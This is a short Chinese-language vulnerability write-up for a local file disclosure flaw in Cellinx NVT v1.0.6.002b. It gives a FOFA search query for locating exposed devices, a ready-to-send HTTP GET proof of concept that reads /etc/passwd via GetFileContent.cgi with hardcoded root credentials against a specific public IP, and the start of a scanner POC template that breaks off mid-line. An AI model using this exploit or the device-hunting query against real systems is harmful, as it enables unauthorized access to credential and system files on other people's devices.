漏洞描述
Cellinx NVT v1.0.6.002b版本存在安全漏洞,该漏洞源于存在本地文件泄露漏洞,攻击者可读取系统密码等敏感信息。
漏洞影响版本
Cellinx NVT v1.0.6.002b
FOFA::body=”local/NVT-string.js”
漏洞复现
漏洞验证poc
GET /cgi-bin/GetFileContent.cgi?USER=root&PWD=D1D1D1D1D1D1D1D1D1D1D1D1A2A2B0A1D1D1D1D1D1D1D1D1D1D1D1D1D1D1B8D1&PATH=/etc/passwd&_=1672577046605 HTTP/1.1
Host: 121.159.32.161
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Tscan POC
poc:
params: []
name: poc-yaml-Cellinx NVT-fileread
set: {}
rules:
- method: GET
path: /cgi-bin/GetFileContent.cgi?USER=ro